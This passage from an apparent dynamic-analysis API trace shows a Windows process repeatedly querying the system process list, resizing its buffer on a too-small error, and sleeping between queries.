ResultLength=0x0) returned 0x0 [0274.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.605] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.614] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.623] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.632] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.633] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.636] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.643] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.652] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.656] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.663] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.672] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.674] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.681] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.693] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.705] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.714] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.723] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.724] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.734] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.743] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.745] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.750] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.756] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.757] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.764] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.765] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.769] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.770] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.777] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.784] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.785] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.786] NtAllocateVirtualMemory (in: 